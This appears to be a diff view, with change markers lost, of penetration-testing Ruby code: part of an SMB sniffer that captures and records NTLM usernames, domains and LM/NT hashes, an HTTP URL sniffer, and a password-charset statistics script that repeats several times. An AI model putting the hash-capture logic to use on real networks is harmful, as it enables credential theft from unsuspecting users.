smb_status = payload[9,4].unpack("V")[0]
if smb_status == 0 # success
smb_status = payload[9,4].unpack("V")[0]
if smb_status == 0 # success
ntlm_ver = detect_ntlm_ver(s[:lmhash],s[:ntlmhash])
ntlm_ver = detect_ntlm_ver(s[:lmhash],s[:ntlmhash])
logmessage =
"#{ntlm_ver} Response Captured in #{s[:smb_version]} session : #{s[:session]} \n" +
"USER:#{s[:user]} DOMAIN:#{s[:domain]} OS:#{s[:peer_os]} LM:#{s[:peer_lm]}\n" +
"SERVER CHALLENGE:#{s[:challenge]} " +
"\nLMHASH:#{s[:lmhash]} " +
"\nNTHASH:#{s[:ntlmhash]}\n"
print_status(logmessage)
logmessage =
"#{ntlm_ver} Response Captured in #{s[:smb_version]} session : #{s[:session]} \n" +
"USER:#{s[:user]} DOMAIN:#{s[:domain]} OS:#{s[:peer_os]} LM:#{s[:peer_lm]}\n" +
"SERVER CHALLENGE:#{s[:challenge]} " +
"\nLMHASH:#{s[:lmhash]} " +
"\nNTHASH:#{s[:ntlmhash]}\n"
print_status(logmessage)
src_ip = s[:client_host]
dst_ip = s[:host]
# know this is ugly , last code added :-/
smb_db_type_hash = case ntlm_ver
when "NTLMv1" then "smb_netv1_hash"
when "NTLM2_SESSION" then "smb_netv1_hash"
when "NTLMv2" then "smb_netv2_hash"
end
# DB reporting
report_auth_info(
:host => dst_ip,
:port => 445,
:sname => 'smb',
:user => s[:user],
:pass => s[:domain] + ":" + s[:lmhash] + ":" + s[:ntlmhash] + ":" + s[:challenge],
:type => smb_db_type_hash,
:proof => "DOMAIN=#{s[:domain]} OS=#{s[:peer_os]}",
:active => true
)
src_ip = s[:client_host]
dst_ip = s[:host]
# know this is ugly , last code added :-/
smb_db_type_hash = case ntlm_ver
when "NTLMv1" then "smb_netv1_hash"
when "NTLM2_SESSION" then "smb_netv1_hash"
when "NTLMv2" then "smb_netv2_hash"
end
# DB reporting
report_auth_info(
:host => dst_ip,
:port => 445,
:sname => 'smb',
:user => s[:user],
:pass => s[:domain] + ":" + s[:lmhash] + ":" + s[:ntlmhash] + ":" + s[:challenge],
:type => smb_db_type_hash,
:proof => "DOMAIN=#{s[:domain]} OS=#{s[:peer_os]}",
:active => true
)
report_note(
:host => src_ip,
:type => "smb_peer_os",
:data => s[:peer_os]
) if (s[:peer_os] and s[:peer_os].strip.length > 0)
report_note(
:host => src_ip,
:type => "smb_peer_os",
:data => s[:peer_os]
) if (s[:peer_os] and s[:peer_os].strip.length > 0)
report_note(
:host => src_ip,
:type => "smb_peer_lm",
:data => s[:peer_lm]
) if (s[:peer_lm] and s[:peer_lm].strip.length > 0)
report_note(
:host => src_ip,
:type => "smb_peer_lm",
:data => s[:peer_lm]
) if (s[:peer_lm] and s[:peer_lm].strip.length > 0)
report_note(
:host => src_ip,
:type => "smb_domain",
:data => s[:domain]
) if (s[:domain] and s[:domain].strip.length > 0)
report_note(
:host => src_ip,
:type => "smb_domain",
:data => s[:domain]
) if (s[:domain] and s[:domain].strip.length > 0)
end
end
end
s[:last] = nil
sessions.delete(s[:session])
end
end
end
end
end
end
s[:last] = nil
sessions.delete(s[:session])
end
end
end
end

View File

@ -6,43 +6,43 @@
# Sniffer class for GET URL's
class SnifferURL < BaseProtocolParser
def register_sigs
self.sigs = {
:get => /^GET\s+([^\n]+)\s+HTTP\/\d\.\d/i,
:webhost => /^HOST\:\s+([^\n\r]+)/i,
}
end
def register_sigs
self.sigs = {
:get => /^GET\s+([^\n]+)\s+HTTP\/\d\.\d/i,
:webhost => /^HOST\:\s+([^\n\r]+)/i,
}
end
def parse(pkt)
# We want to return immediantly if we do not have a packet which is handled by us
return unless pkt.is_tcp?
return if (pkt.tcp_sport != 80 and pkt.tcp_dport != 80)
s = find_session((pkt.tcp_sport == 80) ? get_session_src(pkt) : get_session_dst(pkt))
def parse(pkt)
# We want to return immediantly if we do not have a packet which is handled by us
return unless pkt.is_tcp?
return if (pkt.tcp_sport != 80 and pkt.tcp_dport != 80)
s = find_session((pkt.tcp_sport == 80) ? get_session_src(pkt) : get_session_dst(pkt))
self.sigs.each_key do |k|
self.sigs.each_key do |k|
# There is only one pattern per run to test
matched = nil
matches = nil
# There is only one pattern per run to test
matched = nil
matches = nil
if(pkt.payload =~ self.sigs[k])
matched = k
matches = $1
sessions[s[:session]].merge!({k => matches})
end
if(pkt.payload =~ self.sigs[k])
matched = k
matches = $1
sessions[s[:session]].merge!({k => matches})
end
case matched
when :webhost
sessions[s[:session]].merge!({k => matches})
if(s[:get])
print_status("HTTP GET: #{s[:session]} http://#{s[:webhost]}#{s[:get]}")
sessions.delete(s[:session])
return
end
when nil
# No matches, no saved state
end # end case matched
end # end of each_key
end # end of parse
case matched
when :webhost
sessions[s[:session]].merge!({k => matches})
if(s[:get])
print_status("HTTP GET: #{s[:session]} http://#{s[:webhost]}#{s[:get]}")
sessions.delete(s[:session])
return
end
when nil
# No matches, no saved state
end # end case matched
end # end of each_key
end # end of parse
end # end of URL sniffer

View File

@ -3,20 +3,20 @@
require 'getoptlong'
def help
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
end
ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
@ -24,55 +24,55 @@ ch_num = '0123456789'
ch_sp = '!@#$+=.*'
opts = GetoptLong.new(
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
)
charset = nil
filename = "stats_out"
opts.each do |opt, arg|
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
end
if charset == nil
help
help
end
fstat = File.open(filename, "w")
charset.each_byte do |c|
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
end
fstat.close

View File

@ -3,20 +3,20 @@
require 'getoptlong'
def help
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
end
ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
@ -24,55 +24,55 @@ ch_num = '0123456789'
ch_sp = '!@#$+=.*'
opts = GetoptLong.new(
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
)
charset = nil
filename = "stats_out"
opts.each do |opt, arg|
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
end
if charset == nil
help
help
end
fstat = File.open(filename, "w")
charset.each_byte do |c|
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
end
fstat.close

View File

@ -3,20 +3,20 @@
require 'getoptlong'
def help
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
end
ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
@ -24,55 +24,55 @@ ch_num = '0123456789'
ch_sp = '!@#$+=.*'
opts = GetoptLong.new(
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
)
charset = nil
filename = "stats_out"
opts.each do |opt, arg|
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
end
if charset == nil
help
help
end
fstat = File.open(filename, "w")
charset.each_byte do |c|
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
end
fstat.close

View File

@ -3,20 +3,20 @@
require 'getoptlong'
def help
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
end
ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
@ -24,55 +24,55 @@ ch_num = '0123456789'
ch_sp = '!@#$+=.*'
opts = GetoptLong.new(
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
)
charset = nil
filename = "stats_out"
opts.each do |opt, arg|
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
end
if charset == nil
help
help
end
fstat = File.open(filename, "w")
charset.each_byte do |c|
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
end
fstat.close

View File

@ -3,20 +3,20 @@
require 'getoptlong'
def help
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
end
ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
@ -24,55 +24,55 @@ ch_num = '0123456789'
ch_sp = '!@#$+=.*'
opts = GetoptLong.new(
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
)
charset = nil
filename = "stats_out"
opts.each do |opt, arg|
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
end
if charset == nil
help
help
end
fstat = File.open(filename, "w")
charset.each_byte do |c|
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
end
fstat.close

View File

@ -3,20 +3,20 @@
require 'getoptlong'
def help
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
end
ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
@ -24,55 +24,55 @@ ch_num = '0123456789'
ch_sp = '!@#$+=.*'
opts = GetoptLong.new(
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
)
charset = nil
filename = "stats_out"
opts.each do |opt, arg|
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
end
if charset == nil
help
help
end
fstat = File.open(filename, "w")
charset.each_byte do |c|
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
end
fstat.close

View File

@ -3,20 +3,20 @@
require 'getoptlong'
def help
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
